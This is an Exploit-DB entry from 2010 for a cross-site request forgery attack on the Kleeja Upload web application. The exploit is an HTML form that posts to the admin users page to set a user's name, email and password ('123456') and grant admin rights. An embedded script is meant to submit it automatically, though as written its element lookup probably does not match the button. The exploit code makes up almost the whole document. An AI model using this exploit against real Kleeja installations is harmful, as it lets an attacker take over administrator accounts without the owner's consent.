Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)

EDB-ID:

14629

CVE:



Author:

KOLTN S

Type:

webapps


Platform:

Multiple

Date:

2010-08-12


# Exploit Title: Kleeja Upload - CSRF Change Admin Password
# Date: 11-08-2010
# Author: KOLTN & KoLtN@HoTMaiL.CoM
# Software Link: http://www.kleeja.com
# Software Download: http://www.kleeja.com/download/
# Type : CSRF
# Version: all Version
# Greetz to : Juba & Mushii
#####################Exploit Change Admin Password##########################
<html>
<form method="post" action="http://localhost/kleeja/admin.php?cp=users&page=0">
<input type="text" name="nm_1" value="KoLtN"/>
<input type="text" name="ml_1" value="KoLtN@hotmail.com"/>
<input type="password" name="ps_1" value="123456"/>
<input name="ad_1" type="checkbox" checked="checked"/>
<input type="checkbox" name="del_1" value="1"/>
<input class="button2" name="submit" type="submit"/>
<script>
document.getElementById('submit').click();
</script>
</form>
</body>
</html>
#####################Exploit Change Admin Password##########################

Ramadan Kareem !!